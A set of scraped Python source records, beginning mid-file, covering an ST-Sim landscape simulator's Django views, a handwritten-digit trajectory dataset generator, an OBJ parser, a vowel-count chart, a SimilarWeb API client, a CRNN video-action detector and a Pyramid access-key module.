application\n probabilistic_transition_types = [\"Replacement Fire\",\n \"Annual Grass Invasion\",\n \"Insect/Disease\",\n \"Native Grazing\",\n \"Excessive-Herbivory\"]\n\n if not all(value in all_transition_types for value in probabilistic_transition_types):\n raise KeyError(\"Invalid transition type specified for this library. 
Supplied values: \" +\n str([value for value in probabilistic_transition_types]))\n\n probabilistic_transition_dict = {value: 0 for value in probabilistic_transition_types}\n context['probabilistic_transitions_json'] = json.dumps(probabilistic_transition_dict)\n return context\n\n\nclass STSimSpatialStats(View):\n\n DATA_TYPES = ['veg', 'stateclass']\n\n def __init__(self):\n self.project_id = None\n self.data_type = None\n super().__init__()\n\n def dispatch(self, request, *args, **kwargs):\n self.project_id = kwargs.get('project_id')\n self.data_type = kwargs.get('data_type')\n\n if self.data_type not in self.DATA_TYPES:\n raise ValueError('Invalid data type')\n\n return super(STSimSpatialStats, self).dispatch(request, *args, **kwargs)\n\n def get(self, request, *args, **kwargs):\n\n data = dict()\n if self.data_type == 'veg':\n\n data = spatial_stsim.export_vegtype_definitions(\n pid=self.project_id,\n working_path=default_sc_path,\n orig=True)\n\n elif self.data_type == 'stateclass':\n\n data = spatial_stsim.export_stateclass_definitions(\n pid=self.project_id,\n working_path=default_sc_path,\n orig=True)\n return JsonResponse({\n 'data': {name: data[name]['ID'] for name in data.keys()}\n })\n\n\nclass STSimSpatialOutputs(View):\n\n DATA_TYPES = ['veg', 'stateclass']\n\n def __init__(self):\n\n self.scenario_id = None\n self.timestep = None\n self.data_type = None\n super(STSimSpatialOutputs, self).__init__()\n\n def dispatch(self, request, *args, **kwargs):\n self.scenario_id = kwargs.get('scenario_id')\n self.data_type = kwargs.get('data_type')\n self.timestep = kwargs.get('timestep')\n\n if self.data_type not in self.DATA_TYPES:\n raise ValueError(self.data_type + ' is not a valid data type. Types are \"veg\" or \"stateclass\".')\n\n return super(STSimSpatialOutputs, self).dispatch(request, *args, **kwargs)\n\n def get(self, request, *args, **kwargs):\n\n # TODO - construct a path to the actual directory serving the output tifs from STSim\n image_directory = os.path.join(settings.ST_SIM_WORKING_DIR, 'initial_conditions', 'spatial')\n if self.data_type == 'veg':\n image_path = os.path.join(image_directory, 'veg.png') # TODO - replace with the selected area of interest\n elif self.timestep == 0 or self.timestep == '0':\n image_path = os.path.join(image_directory, 'stateclass_0.png') # TODO - ^^\n else:\n image_path = os.path.join(spatial_stsim.lib + '.output', 'Scenario-'+str(self.scenario_id),\n 'Spatial', 'stateclass_{timestep}.png'.format(timestep=self.timestep))\n\n response = HttpResponse(content_type=\"image/png\")\n image = Image.open(image_path)\n image.save(response, 'PNG')\n return response\n\n\nclass STSimSpatialRunnerView(View):\n\n def __init__(self):\n\n self.scenario_id = None\n self.project_id = None\n super().__init__()\n\n def post(self, request, *args, **kwargs):\n\n # TODO - setup an interface to set this via. 
Include this as ajax'd data into the view.\n run_config = {\n 'min_step': 0,\n 'max_step': 20,\n 'step_size': 1,\n }\n\n # set the run control for the spatial model\n spatial_stsim.update_run_control(\n sid=self.scenario_id, working_path=default_run_control_path,\n spatial=True, iterations=0, start_timestep=0, end_timestep=20\n )\n\n spatial_stsim.set_output_options(self.scenario_id, default_run_control_path,\n SummaryOutputSC=True, SummaryOutputSCTimesteps=1,\n SummaryOutputTR=True, SummaryOutputTRTimesteps=1,\n RasterOutputSC=True, RasterOutputSCTimesteps=1)\n\n # run spatial stsim model at self.scenario_id\n result_scenario_id = spatial_stsim.run_model(sid=self.scenario_id)\n run_config['result_scenario_id'] = result_scenario_id\n\n # process each output raster in the output directory\n stateclass_definitions = spatial_stsim.export_stateclass_definitions(\n pid=self.project_id,\n working_path=default_sc_path,\n orig=True\n )\n\n texture_utils.process_stateclass_directory(\n dir_path=os.path.join(spatial_stsim.lib + '.output', 'Scenario-'+str(result_scenario_id), 'Spatial'),\n sc_defs=stateclass_definitions\n )\n\n # Return the completed spatial run id, and use that ID for obtaining the resulting output timesteps' rasters\n return JsonResponse({'data': run_config})\n\n def dispatch(self, request, *args, **kwargs):\n self.scenario_id = kwargs.get('scenario_id')\n self.project_id = kwargs.get('project_id')\n return super(STSimSpatialRunnerView, self).dispatch(request, *args, **kwargs)\n\n\nclass STSimRunnerView(View):\n\n def __init__(self):\n\n self.sid = None\n super().__init__()\n\n def post(self, request, *args, **kwargs):\n values_dict = json.loads(request.POST['veg_slider_values_state_class'])\n if 'probabilistic_transitions_slider_values' in request.POST:\n transitions_dict = json.loads(request.POST['probabilistic_transitions_slider_values'])\n else:\n transitions_dict = None\n return HttpResponse(json.dumps(run_st_sim(self.sid, values_dict, transitions_dict)))\n\n def dispatch(self, request, *args, **kwargs):\n self.sid = kwargs.get('scenario_id')\n return super(STSimRunnerView, self).dispatch(request, *args, **kwargs)\n\n\ndef run_st_sim(st_scenario, veg_slider_values_state_class_dict, probabilistic_transitions_slider_values_dict=None):\n\n # working file path\n st_model_init_conditions_file = os.path.join(settings.ST_SIM_WORKING_DIR,\n \"initial_conditions\",\n \"user_defined_temp\" + str(time.time()) + \".csv\")\n\n # initial PVT\n stsim.import_nonspatial_distribution(sid=st_scenario,\n values_dict=veg_slider_values_state_class_dict,\n working_path=st_model_init_conditions_file)\n\n # probabilistic transition probabilities\n default_probabilities = stsim.export_probabilistic_transitions_map(\n sid=default_sid,\n transitions_path=st_model_init_conditions_file,\n orig=True)\n\n if probabilistic_transitions_slider_values_dict is not None and len(probabilistic_transitions_slider_values_dict.keys()) > 0:\n user_probabilities = default_probabilities\n # adjust the values of the default probabilites\n for veg_type in user_probabilities.keys():\n for state_class in user_probabilities[veg_type]:\n transition_type = state_class['type']\n if transition_type in probabilistic_transitions_slider_values_dict.keys():\n value = probabilistic_transitions_slider_values_dict[transition_type]\n state_class['probability'] += value\n\n stsim.import_probabilistic_transitions(sid=st_scenario,\n values_dict=user_probabilities,\n working_path=st_model_init_conditions_file)\n else:\n # use default 
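probabilities exported above, unmodified\n        # (no slider adjustments were supplied, so the library defaults pass through)\n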
        stsim.import_probabilistic_transitions(sid=st_scenario,\n                                               values_dict=default_probabilities,\n                                               working_path=st_model_init_conditions_file)\n\n    # run model and collect results\n    st_model_output_sid = stsim.run_model(st_scenario)\n    st_model_results_dir = os.path.join(settings.ST_SIM_WORKING_DIR, \"model_results\")\n    st_model_output_file = os.path.join(st_model_results_dir, \"stateclass-summary-\" + st_model_output_sid + \".csv\")\n    results_json = json.dumps(stsim.export_stateclass_summary(sid=st_model_output_sid,\n                                                              report_path=st_model_output_file))\n    return {'results_json': results_json}\n","sub_path":"ST_Sim_Landscape_Simulator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"486303617","text":"import numpy as np\nfrom scipy.interpolate import interp1d\nimport matplotlib.pyplot as plt\nimport copy\n\ndataType = \"raw500\" #raw500, nor100\ntrain_len = 20000 \ntest_len = 4000\ndata_form =\"direct2\" #point, direct, direct2\npadding = 100 #if nor100, 200(but direct2 must be 200/2) \ninterpo = 1000 #200 or any\nway = \"interpo\" #padding, interpo\n\n# for raw500 with the point form, do not use zeropadding\n\nif(dataType == \"raw500\"):\n    point_data = np.loadtxt('pendigits/ori/train_data.out')\n    target_data = np.loadtxt('pendigits/ori/train_target.out')[: , np.newaxis]\n    point_data_test = np.loadtxt('pendigits/ori/test_data.out')\n    target_data_test = np.loadtxt('pendigits/ori/test_target.out')[: , np.newaxis]\nelif(dataType == \"nor100\"):\n    point_data = np.loadtxt('pendigits/in_train.txt')\n    target_data = np.loadtxt('pendigits/out_train.txt')[: , np.newaxis]\n    point_data_test = np.loadtxt('pendigits/in_test.txt')\n    target_data_test = np.loadtxt('pendigits/out_test.txt')[: , np.newaxis]\n\ndef interpolation(values, count, data_form=\"point\"):\n    if(data_form == \"direct\" or data_form == \"direct2\"):\n        count+=2\n    \n    px=values[::2]\n    py=values[1::2]\n    \n    x = np.linspace(np.min(px), np.max(px), num=px.shape[0], endpoint=True)\n    fx = interp1d(x, px, kind='cubic')\n    xnew = np.linspace(np.min(px), np.max(px), num=count//2, endpoint=True)\n    f_x = fx(xnew)\n    \n    y = np.linspace(np.min(py), np.max(py), num=py.shape[0], endpoint=True)\n    fy = interp1d(y, py, kind='cubic')\n    ynew = np.linspace(np.min(py), np.max(py), num=count//2, endpoint=True)\n    f_y = fy(ynew)\n    \n    result=[]\n    for i in range(len(f_x)):\n        result.append(f_x[i])\n        result.append(f_y[i])\n    \n    if(data_form == \"point\"):\n        return np.array(result)\n    elif(data_form == \"direct\"):\n        return np.array(generate_trajectory_vec(result))\n    elif(data_form == \"direct2\"):\n        return np.array(generate_trajectory_vec_v2(result))\n    else:\n        raise ValueError(\"unrecognized data_form: %s\" % data_form)\n\ndef zeropadding(trajectory, n, data_form=\"point\"):\n    if(len(trajectory)==n):\n        if(data_form == \"point\"):\n            return trajectory\n        elif(data_form == \"direct\"):\n            return np.array(generate_trajectory_vec(trajectory))\n        elif(data_form == \"direct2\"):\n            return np.array(generate_trajectory_vec_v2(trajectory))\n        else:\n            raise ValueError(\"unrecognized data_form: %s\" % data_form)\n    else:\n        if(data_form == \"point\"):\n            trajectory = trajectory\n        elif(data_form == \"direct\"):\n            trajectory = np.array(generate_trajectory_vec(trajectory))\n        elif(data_form == \"direct2\"):\n            trajectory = np.array(generate_trajectory_vec_v2(trajectory))\n        else:\n            raise ValueError(\"unrecognized data_form: %s\" % data_form)\n        \n        npad = n - len(trajectory)\n        B = np.pad(trajectory, pad_width=npad, mode='constant', constant_values=0)[npad:]\n        return B\n\n
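# Hedged usage sketch for the helpers above (toy values; shapes assumed):\n#   traj = np.array([0., 0., 1., 2., 3., 1., 4., 3.])   # flattened x,y pairs\n#   interpolation(traj, 200, data_form=\"point\")         # -> 200 resampled values\n#   zeropadding(traj, 20, data_form=\"direct\")           # -> length-20 step vector\n\n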
def generate_trajectory_vec(trajectory):\n    x = trajectory[::2]\n    y = trajectory[1::2]\n    new_traject=[]\n    for i in range(len(x)-1):\n        new_traject.append(x[i+1]-x[i])\n        new_traject.append(y[i+1]-y[i])\n    return new_traject\n\ndef generate_trajectory_vec_v2(trajectory):\n    x = trajectory[::2]\n    y = trajectory[1::2]\n    new_traject=[]\n    for i in range(len(x)-1):\n        xm = x[i+1]-x[i]\n        ym = y[i+1]-y[i]\n        new_traject.append(direction(xm, ym))\n    return new_traject\n\ndef direction(x, y):\n    # quantize a step vector into one of 8 chain-code directions (0 = no movement)\n    if(x>0):\n        slope = y/x\n        if(slope>0 and slope<=1):\n            return 1\n        if(slope>1):\n            return 2\n        if(slope>-1 and slope<=0):\n            return 8\n        if(slope<=-1):\n            return 7\n    elif(x<0):\n        slope = y/x\n        if(slope<=0 and slope>-1):\n            return 4 \n        if(slope<=-1):\n            return 3 \n        if(slope<1 and slope>=0):\n            return 5\n        if(slope>=1):\n            return 6\n    elif(x==0):\n        if(y>0):\n            return 2\n        if(y<0):\n            return 6\n        if(x==0 and y==0):\n            return 0\n\ndef generate_a_trajectory(train_data, target_data, n, noi=15, data_form=\"point\"):\n    traject=[]\n    targets=[]\n    for i in range(n):\n        index = np.random.randint(train_data.shape[0])\n        traject.append(train_data[index])\n        targets.append(int(target_data[index]))\n#    trajects = [train_data[np.random.randint(train_data.shape[0])] for i in range(n)]\n    trajects = copy.copy(traject)\n    trajectory = []\n    pre_gap=0\n    pos = 0\n    if(dataType == \"raw500\"):\n        if(n==1):\n            for j in range(int(trajects[0][-1])):\n                trajectory.append(trajects[0][j])\n        else:\n            for i in range(n-1):\n                links = []\n                p0 = trajects[i]\n                p1 = trajects[i+1]\n                gap = 500\n                p0[:-1:2]-=pre_gap\n                p1[:-1:2]+= gap\n                for j in range(0, int(p0[-1]), 2):\n                    links.append(p0[j]+pos)\n                    links.append(p0[j+1])\n                if(i == n-2):\n                    for j in range(0, int(p1[-1]), 2):\n                        links.append(p1[j]+pos)\n                        links.append(p1[j+1])\n                    p1[:-1:2]-=gap\n                trajectory.extend(links)\n                pre_gap=gap\n                pos+=gap\n    elif(dataType == \"nor100\"):\n        if(n==1):\n            for j in range(int(len(trajects[0]))):\n                trajectory.append(trajects[0][j])\n        else:\n            for i in range(n-1):\n                links = []\n                p0 = trajects[i]\n                p1 = trajects[i+1]\n                gap = 100\n                p0[::2]-=pre_gap\n                p1[::2]+= gap\n                for j in range(0, len(p0), 2):\n                    links.append(p0[j]+pos)\n                    links.append(p0[j+1])\n                #insert two interpolated bridge points between adjacent digits \n                p0p1x = np.abs(p0[-2]-p1[0])/3\n                p0p1y = np.abs(p0[-1]-p1[1])/3\n                for j in range(2):\n                    links.append(p0[-2]+p0p1x*(j+1)+pos)\n                    links.append(p0[-1]+p0p1y*(j+1))\n                #end of bridge points \n                if(i == n-2):\n                    for j in range(0, len(p1), 2):\n                        links.append(p1[j]+pos)\n                        links.append(p1[j+1])\n                    p1[:-1:2]-=gap\n                trajectory.extend(links)\n                pre_gap=gap\n                pos+=gap  \n    \n    if(data_form == \"point\" or data_form == \"direct\" or data_form == \"direct2\"):\n        return np.array(trajectory), np.array(targets)\n    else:\n        raise ValueError(\"unrecognized data_form: %s\" % data_form)\n    \n################################################################################################################\n\nif(data_form == \"point\"):\n    if(way == \"padding\"):\n        new_point_data = np.zeros((train_len, padding)) #length = max total number of trajectory points\n        new_point_data_Te = np.zeros((test_len, padding))\n    elif(way == \"interpo\"):\n        new_point_data = np.zeros((train_len, interpo)) #length = max total number of trajectory points\n        new_point_data_Te = np.zeros((test_len, interpo))\n    \nif(data_form == \"direct\" or data_form == \"direct2\"):\n    if(way == \"padding\"):\n        new_point_data = np.zeros((train_len, padding)) #length = max total number of trajectory points\n        new_point_data_Te = np.zeros((test_len, padding))\n    elif(way == \"interpo\" and data_form == \"direct\"):\n        new_point_data = np.zeros((train_len, interpo)) #length = max total number of trajectory points\n        new_point_data_Te = np.zeros((test_len, interpo))\n    elif(way == \"interpo\" and data_form == \"direct2\"):\n
\"direct2\"):\n new_point_data = np.zeros((train_len, interpo//2)) #最長總長軌跡點個數\n new_point_data_Te = np.zeros((test_len, interpo//2))\n \nnew_target_data = np.zeros((train_len,10,10)) #分成10張,0~9種class\nnew_target_data_Te = np.zeros((test_len,10,10)) \n\ncount=0\n#製造train dataset\nfor i in range(train_len):\n num = np.random.randint(1,11) #軌跡總共有幾個數字,1~10\n trajectory, target = generate_a_trajectory(point_data, target_data, num, 30, data_form)\n if(way==\"padding\"):\n new_point_data[i] = zeropadding(trajectory, padding, data_form)\n elif(way==\"interpo\"):\n new_point_data[i] = interpolation(trajectory, interpo, data_form)\n s_array = np.zeros((10,10)) \n for j, number in enumerate(target):\n c_array = np.zeros(10)\n c_array[number] = 1\n s_array[j] = c_array\n new_target_data[i] = s_array\n \n#製造test dataset\nfor i in range(test_len):\n num = np.random.randint(1,11) #軌跡總共有幾個數字,1~10\n trajectory, target = generate_a_trajectory(point_data_test, target_data_test, num, 30, data_form)\n if(way==\"padding\"):\n new_point_data_Te[i] = zeropadding(trajectory, padding, data_form)\n elif(way==\"interpo\"):\n new_point_data_Te[i] = interpolation(trajectory, interpo, data_form)\n s_array = np.zeros((10,10)) \n for j, number in enumerate(target):\n c_array = np.zeros(10)\n c_array[number] = 1\n s_array[j] = c_array\n new_target_data_Te[i] = s_array\n\nnp.savetxt(\"database/temp/\"+dataType+\"/\"+data_form+\"/train_data_\"+dataType+\"_\"+data_form+\"_\"+way+\".out\", new_point_data) \nnp.savetxt(\"database/temp/\"+dataType+\"/\"+data_form+\"/train_target_\"+dataType+\"_\"+data_form+\"_\"+way+\".out\", new_target_data.reshape(new_target_data.shape[0], new_target_data.shape[1]*new_target_data.shape[2])) \nnp.savetxt(\"database/temp/\"+dataType+\"/\"+data_form+\"/test_data_\"+dataType+\"_\"+data_form+\"_\"+way+\".out\", new_point_data_Te) \nnp.savetxt(\"database/temp/\"+dataType+\"/\"+data_form+\"/test_target_\"+dataType+\"_\"+data_form+\"_\"+way+\".out\", new_target_data_Te.reshape(new_target_data_Te.shape[0], new_target_data_Te.shape[1]*new_target_data_Te.shape[2])) \n\nwith open(\"database/temp/\"+dataType+\"/\"+data_form+\"/inform_\"+dataType+\"_\"+data_form+\"_\"+way+\".txt\", 'w') as file:\n file.write(dataType+'\\n')\n file.write(data_form+'\\n')\n if(way==\"padding\"):\n file.write(way+\" : \"+str(padding)+'\\n')\n elif(way==\"interpo\"): \n file.write(way+\" : \"+str(interpo)+'\\n')\n file.write('\\n')\n file.write(\"train size : \"+str(new_point_data.shape[0])+\" \"+str(new_point_data.shape[1])+'\\n')\n file.write(\"test size : \"+str(new_point_data_Te.shape[0])+\" \"+str(new_point_data_Te.shape[1]))\n \n\ndef show(data, target, ind):\n fig_size = plt.rcParams[\"figure.figsize\"]\n plt.figure(figsize=(fig_size[0], fig_size[1]))\n if(dataType==\"raw500\"):\n plt.xlim(0,5000)\n elif(dataType==\"nor100\"):\n plt.xlim(0,1000)\n plt.ylim(0,1000)\n plt.plot(data[ind][::2], data[ind][1::2], 'b-', data[ind][::2], data[ind][1::2], 'r-', label=\"trajectory\")\n for i in range(0, len(data[ind]), 2):\n if(i%20 >= 16 or (i+1)%20 >= 16):\n plt.scatter(data[ind][i], data[ind][i+1], marker='o' , c='b')\n else:\n plt.scatter(data[ind][i], data[ind][i+1], marker='o' , c='y')\n# plt.text(data[ind][i], data[ind][i+1], i)\n plt.legend()\n plt.show()\n print(np.argmax(target[ind], axis=1))\n return data[ind]\n\ndef show_v2(data):\n fig_size = plt.rcParams[\"figure.figsize\"]\n plt.figure(figsize=(fig_size[0], fig_size[1]))\n if(dataType==\"raw500\"):\n plt.xlim(0,5000)\n elif(dataType==\"nor100\"):\n plt.xlim(0,1000)\n 
    plt.ylim(0,1000)\n    plt.plot(data[ind][::2], data[ind][1::2], 'b-', data[ind][::2], data[ind][1::2], 'r-', label=\"trajectory\")\n    for i in range(0, len(data[ind]), 2):\n        if(i%20 >= 16 or (i+1)%20 >= 16):\n            plt.scatter(data[ind][i], data[ind][i+1], marker='o' , c='b')\n        else:\n            plt.scatter(data[ind][i], data[ind][i+1], marker='o' , c='y')\n#        plt.text(data[ind][i], data[ind][i+1], i)\n    plt.legend()\n    plt.show()\n    print(np.argmax(target[ind], axis=1))\n    return data[ind]\n\ndef show_v2(data):\n    fig_size = plt.rcParams[\"figure.figsize\"]\n    plt.figure(figsize=(fig_size[0], fig_size[1]))\n    if(dataType==\"raw500\"):\n        plt.xlim(0,5000)\n    elif(dataType==\"nor100\"):\n        plt.xlim(0,1000)\n    plt.ylim(0,1000)\n    plt.plot(data[::2], data[1::2], 'b-', data[::2], data[1::2], 'r-', label=\"trajectory\")\n    for i in range(0, len(data), 2):\n        if(i%20 >= 16 or (i+1)%20 >= 16):\n            plt.scatter(data[i], data[i+1], marker='o' , c='b')\n        else:\n            plt.scatter(data[i], data[i+1], marker='o' , c='y')\n#        plt.text(data[ind][i], data[ind][i+1], i)\n    plt.legend()\n    plt.show()\n    return None\n\n","sub_path":"generate_trajectory3.py","file_name":"generate_trajectory3.py","file_ext":"py","file_size_in_byte":11830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"503287128","text":"##\r\n## UNIVERSIDAD DEL VALLE DE GUATEMALA\r\n## COMPUTER GRAPHICS\r\n## SECTION 20\r\n##\r\n## SR4: Flat Shading\r\n## LUIS PEDRO CUÉLLAR - 18220\r\n##\r\n\r\nclass Object(object):\r\n    def __init__(self, filename):\r\n        with open(filename, 'r') as file:\r\n            self.lines = [line for line in file.readlines() if line.strip()]\r\n\r\n        self.vertices = []\r\n        self.normals = []\r\n        self.texcoords = []\r\n        self.faces = []\r\n\r\n        self.read()\r\n\r\n    def read(self):\r\n        for line in self.lines:\r\n            if line:\r\n                prefix, value = line.split(' ', 1)\r\n\r\n                if prefix == 'v': # vertices\r\n                    self.vertices.append(list(map(float,value.split(' '))))\r\n                elif prefix == 'vn':\r\n                    self.normals.append(list(map(float,value.split(' '))))\r\n                elif prefix == 'vt':\r\n                    self.texcoords.append(list(map(float,value.split(' '))))\r\n                elif prefix == 'f':\r\n                    if \"//\" in value:\r\n                        self.faces.append([list(map(int,vert.split('//'))) for vert in value.split(' ')])\r\n\r\n                    else:\r\n                        self.faces.append([list(map(int,vert.split('/'))) for vert in value.split(' ')])\r\n","sub_path":"object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"561140818","text":"import matplotlib.pyplot as plt\n\nmyFile=open(\"a.txt\",'r')\n\naCount=0\neCount=0\niCount=0\noCount=0\nuCount=0\nyCount=0\n\nfor line in myFile:\n    for word in line.split():\n        current=word.lower()\n        aCount=aCount+current.count('a')\n        eCount=eCount+current.count('e')\n        iCount=iCount+current.count('i')\n        oCount=oCount+current.count('o')\n        uCount=uCount+current.count('u')\n        yCount=yCount+current.count('y')\n\n\nprint(aCount)\nprint(eCount)\n###\n# Data to plot (u and y are tallied above but not charted)\nlabels = 'Letter A', 'Letter E', 'Letter I', 'Letter O'\nsizes = [aCount, eCount, iCount, oCount]\ncolors = ['gold', 'yellowgreen', 'lightcoral', 'lightskyblue']\nexplode = (0.1, 0, 0, 0)  # explode 1st slice\n \n# Plot\nplt.pie(sizes, explode=explode, labels=labels, colors=colors,\n        autopct='%1.1f%%', shadow=True, startangle=140)\n \nplt.axis('equal')\nplt.show()\n\n","sub_path":"Programy na kolokwium/liczneisamoglosek/samogloski.py","file_name":"samogloski.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"365434340","text":"import urllib2\nimport json\nimport os.path\nimport persistence\nfrom memoization import persistently_memoized\n\nKEY_MANAGER_FILE_NAME = 'KeyManager.json'\nSIMILARWEB_URL_FORMAT = \"http://api.similarweb.com/Site/{domain}/v2/alsovisited?Format={format}&UserKey={key}\"\nSIMILARWEB_RESPONSE_TOP_KEY = u\"AlsoVisited\"\nSIMILARWEB_RESPONSE_URL_KEY = u\"Url\"\nSIMILARWEB_RESPONSE_SCORE_KEY = u\"Score\"\n\nclass KeyManager(object):\n    USES_PER_KEY = 66\n    \n    def __init__(self, file_path):\n        self.__file_path = file_path\n        with open(file_path, 'r') as ifile:\n
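            # expected JSON shape (assumption): {\"keys\": [...], \"use_count\": <int>}\n            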
persistent_state = json.load(ifile)\n self.__keys = persistent_state['keys']\n self.__use_count = persistent_state['use_count']\n\n def get_key(self):\n try:\n if self.__use_count >= KeyManager.USES_PER_KEY:\n self.__keys = self.__keys[1:]\n self.__use_count = 0\n self.__use_count += 1\n return self.__keys[0]\n\n finally:\n persistent_state = {'keys': self.__keys, 'use_count': self.__use_count}\n with open(self.__file_path, 'w') as ofile:\n json.dump(persistent_state, ofile)\n\nkey_manager = KeyManager(os.path.join(persistence.persistent_cache_directory, KEY_MANAGER_FILE_NAME))\n\n@persistently_memoized\ndef get_correlated_websites(domain):\n similarweb_url = SIMILARWEB_URL_FORMAT.format(domain=domain, format=\"JSON\", key=key_manager.get_key())\n try:\n response = urllib2.urlopen(similarweb_url)\n except urllib2.HTTPError:\n return ()\n response_string = response.read()\n response_dict = json.loads(response_string)\n return tuple((entry[SIMILARWEB_RESPONSE_URL_KEY].decode('utf-8'), entry[SIMILARWEB_RESPONSE_SCORE_KEY])\n for entry in response_dict[SIMILARWEB_RESPONSE_TOP_KEY])\n","sub_path":"python/similarweb.py","file_name":"similarweb.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"612082145","text":"import os\nimport numpy as np\nimport torch\nimport torchvision.transforms as transforms\nimport torch.utils.data as data\nimport matplotlib.pyplot as plt\nfrom functions import *\nfrom sklearn.preprocessing import OneHotEncoder, LabelEncoder\nfrom sklearn.metrics import accuracy_score\nimport pandas as pd\nimport pickle\nfrom utils.utils import *\n\n# set path\ndata_path = \"/home/gjj/data/jpegs_256\" # define UCF-101 RGB data path\nframes_test_floder=\"v_ApplyEyeMakeup_g01_c01\"\naction_name_path = \"./_UCF101actions.pkl\"\nsave_model_path = \"./ResNetCRNN_ckpt/\"\n\n# use same encoder CNN saved!\nCNN_fc_hidden1, CNN_fc_hidden2 = 1024, 768\nCNN_embed_dim = 512 # latent dim extracted by 2D CNN\nres_size = 224 # ResNet image size\ndropout_p = 0.0 # dropout probability\n\n# use same decoder RNN saved!\nRNN_hidden_layers = 3\nRNN_hidden_nodes = 512\nRNN_FC_dim = 256\n\n# training parameters\nk = 101 # number of target category\nbatch_size = 40\n# Select which frame to begin & end in videos\nbegin_frame, end_frame, skip_frame = 1, 29, 1\n\n\nwith open(action_name_path, 'rb') as f:\n action_names = pickle.load(f) # load UCF101 actions names\n\n# convert labels -> category\nle = LabelEncoder()\nle.fit(action_names)\n\n\n\n# data loading parameters\nuse_cuda = torch.cuda.is_available() # check if GPU exists\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\") # use CPU or GPU\nparams = {'batch_size': batch_size, 'shuffle': True, 'num_workers': 4, 'pin_memory': True} if use_cuda else {}\n\n\ntransform = transforms.Compose([transforms.Resize([res_size, res_size]),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n\nselected_frames = np.arange(begin_frame, end_frame, skip_frame).tolist()\n\n# read single img\nsingle_data_loader=Img_trans_2_detect(data_path,frames_test_floder,selected_frames,use_transform=transform)\nsingle_data_loader.unsqueeze_(0)\n\n# reload CRNN model\ncnn_encoder = ResCNNEncoder(fc_hidden1=CNN_fc_hidden1, fc_hidden2=CNN_fc_hidden2, drop_p=dropout_p, CNN_embed_dim=CNN_embed_dim).to(device)\nrnn_decoder = DecoderRNN(CNN_embed_dim=CNN_embed_dim, h_RNN_layers=RNN_hidden_layers, h_RNN=RNN_hidden_nodes, \n 
h_FC_dim=RNN_FC_dim, drop_p=dropout_p, num_classes=k).to(device)\n\ncnn_encoder.load_state_dict(torch.load(os.path.join(save_model_path, 'cnn_encoder_epoch63_singleGPU.pth')))\nrnn_decoder.load_state_dict(torch.load(os.path.join(save_model_path, 'rnn_decoder_epoch63_singleGPU.pth')))\nprint('CRNN model reloaded!')\n\nt1 = torch_utils.time_synchronized()\ny_pred = CRNN_detect_prediction([cnn_encoder, rnn_decoder], device, single_data_loader)\nt2 = torch_utils.time_synchronized()\nprint('%sDone. (%.3fs)' % (\"time used is \", t2 - t1))\n\nprint(cat2labels(le,y_pred))\n\nprint('video prediction finished!')\n\n\n\n\n","sub_path":"ResNetCRNN/ResNetCRNN_detect.py","file_name":"ResNetCRNN_detect.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"153395760","text":"\"\"\"Access_key types file.\"\"\"\n\nfrom pyramid.view import view_config\nfrom pyramid.security import (\n Allow,\n Deny,\n Authenticated,\n Everyone,\n)\nfrom pyramid.settings import asbool\nfrom ..acl import (\n DELETED_ACL,\n ONLY_ADMIN_VIEW_ACL,\n OWNER_ROLE\n)\nfrom .base import (\n Item\n)\nfrom ..authentication import (\n generate_password,\n generate_user,\n CRYPT_CONTEXT,\n)\nfrom snovault import (\n collection,\n load_schema,\n)\nfrom snovault.crud_views import (\n collection_add,\n item_edit,\n)\nfrom snovault.validators import (\n validate_item_content_post,\n)\nfrom snovault.util import debug_log\nfrom snovault.types.access_key import (\n AccessKey as SnovaultAccessKey,\n access_key_add as snovault_access_key_add,\n access_key_reset_secret as snovault_access_key_reset_secret,\n access_key_view_raw as snovault_access_key_view_raw\n)\n\n\n@collection(\n name='access-keys',\n unique_key='access_key:access_key_id',\n properties={\n 'title': 'Access keys',\n 'description': 'Programmatic access keys',\n },\n acl=[\n (Allow, Authenticated, 'add'),\n (Allow, 'group.admin', 'list'),\n (Allow, 'group.read-only-admin', 'list'),\n (Allow, 'remoteuser.INDEXER', 'list'),\n (Allow, 'remoteuser.EMBED', 'list'),\n (Deny, Everyone, 'list'),\n ])\nclass AccessKey(Item, SnovaultAccessKey):\n \"\"\"AccessKey class.\"\"\"\n\n item_type = 'access_key'\n schema = load_schema('encoded:schemas/access_key.json')\n name_key = 'access_key_id'\n embedded_list = []\n\n STATUS_ACL = {\n 'current': [(Allow, OWNER_ROLE, ['view', 'edit'])] + ONLY_ADMIN_VIEW_ACL,\n 'deleted': DELETED_ACL,\n }\n\n def __ac_local_roles__(self):\n \"\"\"grab and return user as owner.\"\"\"\n owner = 'userid.%s' % self.properties['user']\n return {owner: OWNER_ROLE}\n\n class Collection(Item.Collection):\n pass\n\n\n# access keys have view permissions for update so readonly admin and the like\n# can create access keys to download files.\n@view_config(context=AccessKey.Collection, request_method='POST',\n permission='add',\n validators=[validate_item_content_post])\n@debug_log\ndef access_key_add(context, request):\n return snovault_access_key_add(context, request)\n\n\n@view_config(name='reset-secret', context=AccessKey,\n permission='add',\n request_method='POST', subpath_segments=0)\n@debug_log\ndef access_key_reset_secret(context, request):\n return snovault_access_key_reset_secret(context, request)\n\n\n@view_config(context=AccessKey, permission='view_raw', request_method='GET', name='raw')\n@debug_log\ndef access_key_view_raw(context, request):\n return snovault_access_key_view_raw(context, 
